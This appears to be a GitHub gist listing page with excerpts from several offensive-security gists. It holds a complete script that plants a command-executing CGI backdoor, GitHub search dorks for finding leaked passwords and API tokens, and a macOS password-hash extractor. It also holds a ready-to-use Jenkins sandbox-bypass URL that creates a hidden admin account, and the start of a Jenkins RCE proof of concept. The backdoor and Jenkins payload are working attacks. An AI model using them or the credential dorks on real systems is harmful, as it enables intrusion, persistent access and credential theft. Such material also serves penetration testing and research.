Chris Gates carnal0wnage
MarkBaggett
/ gist:38dcff6a0975f148aa858e924d64c492
Created
November 14, 2020 18:22
http.server cgi backdoor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd /tmp | |
| mkdir cgi-bin | |
| echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
| echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
| echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
| chmod +x ./cgi-bin/backdoor.cgi | |
| python -m http.server --cgi | |
cmc
/ YubiHSM2 Backed SSH Certificates
Last active
October 8, 2021 12:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!] | |
| 1. Get a YubiHSM2 @ https://www.yubico.com/products/hardware-security-module/ | |
| 2. Follow this: https://github.com/YubicoLabs/yubihsm-ssh-tool [ Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc, ..] on your issuing machine, or airgapped machine. | |
| 3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine. | |
| 3. Update /etc/ssh/sshd_config on remote server to add: | |
| TrustedUserCAKeys /etc/ssh/ca.pub | |
| AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u | |
| 4. Add principals here: | |
| ex: |
jhaddix
/ Github bash generated search links (from hunter.sh)
Created
January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
kmcquade
/ AWS API calls that return credentials.md
Last active
June 11, 2025 07:04
AWS API calls that return credentials
teddziuba
/ osx_extract_hash.py
Last active
May 30, 2025 13:56
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Mac OSX Catalina User Password Hash Extractor | |
| Extracts a user's password hash as a hashcat-compatible string. | |
| Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords | |
| (hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist | |
| format, so previously reported methods for extracting the hash don't work. |
nullenc0de
/ auto_git_query
Last active
January 7, 2025 15:10
Automated Github Queries (Can open 29 tabs at a time)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}} |
adamyordan
/ CVE-2019-1003000-Jenkins-RCE-POC.py
Last active
July 29, 2019 09:29
CVE-2019-1003000-Jenkins-RCE-POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author: Adam Jordan | |
| # Date: 2019-02-15 | |
| # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc | |
| # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) | |
| import argparse | |
| import jenkins |
namishelex01
/ Security Engineer - Interview Questions.md
Last active
September 15, 2024 11:34
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names
curl -sk https://localhost:10250/pods/- If
--anonymous-authis turned off, you will see a401 Unauthorizedresponse. - If
--anonymous-authistrueand--authorization-modeisWebhookyou'll see403 Forbiddenresponse with messageForbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy) - If
--anonymous-authistrueand--authorization-modeisAlwaysAllowyou'll see a list of pods.
NewerOlder